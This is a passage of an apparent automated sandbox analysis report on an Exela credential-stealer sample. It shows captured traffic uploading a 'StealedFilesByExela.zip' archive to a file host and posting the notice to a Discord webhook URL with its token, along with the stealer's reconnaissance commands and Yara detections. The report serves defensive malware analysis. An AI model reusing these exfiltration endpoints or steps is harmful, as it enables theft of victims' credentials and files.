                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC16384OUTData Raw: 07 2d e5 b8 8a dc ec eb 39 60 78 4c 5c 18 e4 45 0d b8 6f db fc 98 66 7a 8a a1 45 4c cc 44 61 93 af fe 70 3d c6 75 e6 42 76 2e 14 92 f3 79 1b e1 35 96 dd 43 33 6c 03 00 ec 4e 4a 9f ea 6a 51 1b fa c8 55 b1 2d 5d e5 2c 50 5c f4 da b6 de bf cf 6b 95 63 bf 31 26 83 07 65 58 b6 33 c0 29 b7 7e 33 f2 2d 51 a6 2b 2e d9 a2 63 7a d4 12 9c 27 3a 1d be 49 80 f8 a2 a6 3f 76 16 03 b7 26 bc b6 8d be 8f a7 4f 54 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb 37 75 c1 35 1b 3a 17 5e 1f df 36 12 42 91 e6 76 6f 67 c3 81 90 70 6b 1b ef f9 c7 41 e5 cd 3a e7 97 0e 5f 7f 7f fe 00 50 4b 03
                                                                                                                                                                                                                                                          Data Ascii: -9`xL\EofzELDap=uBv.y5C3lNJjQU-],P\kc1&eX3)~3-Q+.cz':I?v&OTP{(eM=h]od1ad'*Dc".xR[>fj|/oViw&D7u5:^6BvogpkA:_PK
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC16384OUTData Raw: 2e 97 97 3b 44 2c 62 2a 16 9c 5f 65 15 a5 ec 92 be cd 8d 9a cc 70 4e e1 a5 3e ba 23 dc 6a 95 a1 64 ab c9 f2 15 5b 30 04 6d 13 0d 90 4a 46 5b 2f c5 d8 6f 68 65 1c c3 98 bd a1 d1 4c 78 2f eb 1e 6c 82 58 9a 35 e7 08 d2 c6 dc 95 48 33 40 86 eb b4 3c af 12 87 79 d3 ea a9 0d c3 74 46 a9 77 22 d5 8d b1 3e e1 79 0b bb aa 24 5f a6 77 3e 0b 3d 98 de 3b e9 58 4e 73 c3 59 df f2 d8 b9 c3 d6 e2 80 82 49 c9 86 e9 ab c4 8d 01 66 f2 de 87 1b 37 94 8e d2 df 83 98 1c 85 fd fb ab d4 24 f3 b8 0e 27 9b 2a fd de a0 dc 96 9b c6 fd e8 f3 29 3e 43 3a 97 e0 e5 49 1f 7f 27 69 ff 0d 53 f7 ea 6b e9 71 93 ec 59 e3 1e 93 e5 24 29 30 88 f6 e9 c4 c7 51 a3 19 4f e0 00 f9 ee e5 97 ef c6 bc ae 9b 62 40 8f 53 f5 18 31 5e 17 bf 9d 93 ff 6c be 46 43 57 56 43 9c c7 64 2a dc cf c0 e0 1a 6e 39 bc
                                                                                                                                                                                                                                                          Data Ascii: .;D,b*_epN>#jd[0mJF[/oheLx/lX5H3@<ytFw">y$_w>=;XNsYIf7$'*)>C:I'iSkqY$)0QOb@S1^lFCWVCd*n9
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC8830OUTData Raw: ec 88 94 17 95 86 e0 f7 17 89 63 48 3d 8e 67 25 d4 0d 01 ac b7 a6 4e 80 fd dc cd c7 41 48 a6 34 0e 68 ed de fd 29 18 5a 3a 7b 27 e5 94 f1 22 fc 42 0a b0 4e 2d 75 8f 54 27 e3 42 90 e5 4f 3a 84 77 d7 3a 07 9d 9d df 61 ef 46 67 e3 c2 76 00 43 b8 a3 71 d7 35 eb 47 93 80 2d 5d d6 a4 71 45 9f f2 28 cc 29 7b bc 12 d9 da 56 62 dd 93 75 39 b4 b1 7b d0 cf 7b f2 61 a9 2f 6a ef 37 4a b7 87 f2 55 f6 85 e3 26 6e 57 77 ae 0f f6 de dc f9 16 cf 07 62 9f d0 ba 96 db 27 fb fd 18 e6 ee a8 df 68 ce 69 5e 9f 8a 8a bd ad f9 71 0e d2 0f 8c 23 46 96 90 9b f1 02 c7 e2 7c 9f a7 d5 5c 91 af 27 c7 95 8a ee 2f 8f 5c 55 36 f1 fb cc d7 c7 97 f2 42 1d e8 23 3d fa 28 8e 72 4a 7e c2 f7 00 a7 e6 df a3 e5 7b 79 5f c6 cf 84 97 d0 db 30 e2 a8 0f 39 02 88 69 c9 46 23 03 8d 2f d0 43 67 4c fc d0
                                                                                                                                                                                                                                                          Data Ascii: cH=g%NAH4h)Z:{'"BN-uT'BO:w:aFgvCq5G-]qE(){Vbu9{{a/j7JU&nWwb'hi^q#F|\'/\U6B#=(rJ~{y_09iF#/CgL
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC2OUTData Raw: 0d 0a
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC38OUTData Raw: 2d 2d 38 64 38 32 31 33 31 31 39 30 65 32 34 39 30 31 61 64 33 63 31 62 39 62 33 61 33 64 35 66 38 32 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --8d82131190e24901ad3c1b9b3a3d5f82--
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.25.3
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:27 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 313
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC313INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 22 6d 6e 32 6c 4e 57 22 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 6d 6e 32 6c 4e 57 22 2c 22 66 69 6c 65 49 64 22 3a 22 65 65 63 64 63 37 33 66 2d 64 39 64 39 2d 34 62 61 33 2d 39 30 32 61 2d 35 64 61 61 62 32 63 63 33 30 65 61 22 2c 22 66 69 6c 65 4e 61 6d 65 22 3a 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 64 58 5a 61 4c 37 4b 4e 76 30 6f 5a 6d 64 36 4b 73 66 55 57 68 4f 56 43 62 50 42 62 70 38 47 6f 22 2c 22 6d 64 35 22 3a 22 64 38 37 65 39 63 39 62 37 35 65 35 30 62 31 34 35 66 61 32 37 64 34 63 35 38 32 38 66 32 62 30 22 2c 22 70 61 72 65 6e 74 46 6f 6c 64 65
                                                                                                                                                                                                                                                          Data Ascii: {"data":{"code":"mn2lNW","downloadPage":"https://gofile.io/d/mn2lNW","fileId":"eecdc73f-d9d9-4ba3-902a-5daab2cc30ea","fileName":"StealedFilesByExela.zip","guestToken":"dXZaL7KNv0oZmd6KsfUWhOVCbPBbp8Go","md5":"d87e9c9b75e50b145fa27d4c5828f2b0","parentFolde


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.449762162.159.128.2334436816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC276OUTPOST /api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: discord.com
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC419OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 53 74 65 61 6c 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d 62
                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Stealed Files***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thumb
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC1365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          set-cookie: __dcfduid=81608906025f11efb039be452c0845c9; Expires=Mon, 23-Apr-2029 17:24:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1713979470
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pyMWczbleQALJS%2BMQCD44S9SoXDnwVNjYlOGYcGpHbcPsbt3ugBUdVdoWGwQ57MMKdlAbt9Moc4yO9Fxd%2By6lynJefgXGXeHaUfp1xw3FQKDIB1uhHcM8kChF%2F8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                          Set-Cookie: __sdcfduid=81608906025f11efb039be452c0845c9902407b9c63a87615a9b24dbfd4ff0121e3e8bb9ff0365232310f373b2ba71f9; Expires=Mon, 23-Apr-2029 17:24:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          Set-Cookie: __cfruid=418df2eda9f10ccb09d5126301cea6bca0418ed5-1713979468; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 37 43 6f 2e 33 33 38 55 64 5a 41 64 6a 62 6f 76 5f 44 6a 6a 68 54 4d 37 75 4b 75 76 78 48 5f 5a 4a 74 76 66 58 57 6a 41 57 74 6f 2d 31 37 31 33 39 37 39 34 36 38 38 31 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 37 39 37 63 39 37 66 30 63 61 33 61 39 38 34 2d 4c 41 53 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=7Co.338UdZAdjbov_DjjhTM7uKuvxH_ZJtvfXWjAWto-1713979468814-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8797c97f0ca3a984-LAS
                                                                                                                                                                                                                                                          2024-04-24 17:24:28 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                          Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:19:23:57
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff72aa70000
                                                                                                                                                                                                                                                          File size:11'317'024 bytes
                                                                                                                                                                                                                                                          MD5 hash:D53E9B9D10AFFCF90E613ABCCC702CA2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                          Start time:19:23:58
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff72aa70000
                                                                                                                                                                                                                                                          File size:11'317'024 bytes
                                                                                                                                                                                                                                                          MD5 hash:D53E9B9D10AFFCF90E613ABCCC702CA2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                          Start time:19:23:59
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:19:23:59
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "gdb --version"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f9cd0000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
